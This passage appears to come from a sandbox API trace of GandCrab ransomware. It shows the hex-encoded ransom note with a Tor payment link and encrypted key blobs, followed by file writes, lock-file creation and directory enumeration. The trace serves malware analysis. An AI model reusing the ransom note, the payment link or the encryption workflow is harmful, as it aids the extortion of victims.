5\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.295] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0073.296] CloseHandle (hObject=0x2bc) returned 1 [0073.296] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.296] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.296] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x25e)) [0073.296] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.297] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.297] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.297] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a09d2ca4deb61a.lock") returned 98 [0073.297] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0073.299] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.300] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 74 [0073.300] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0073.300] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503838 [0073.300] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.300] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.300] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.300] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.300] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.300] lstrcmpW (lpString1="ContentStore.xml", lpString2=".") returned 1 [0073.300] lstrcmpW (lpString1="ContentStore.xml", lpString2="..") returned 1 [0073.300] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", 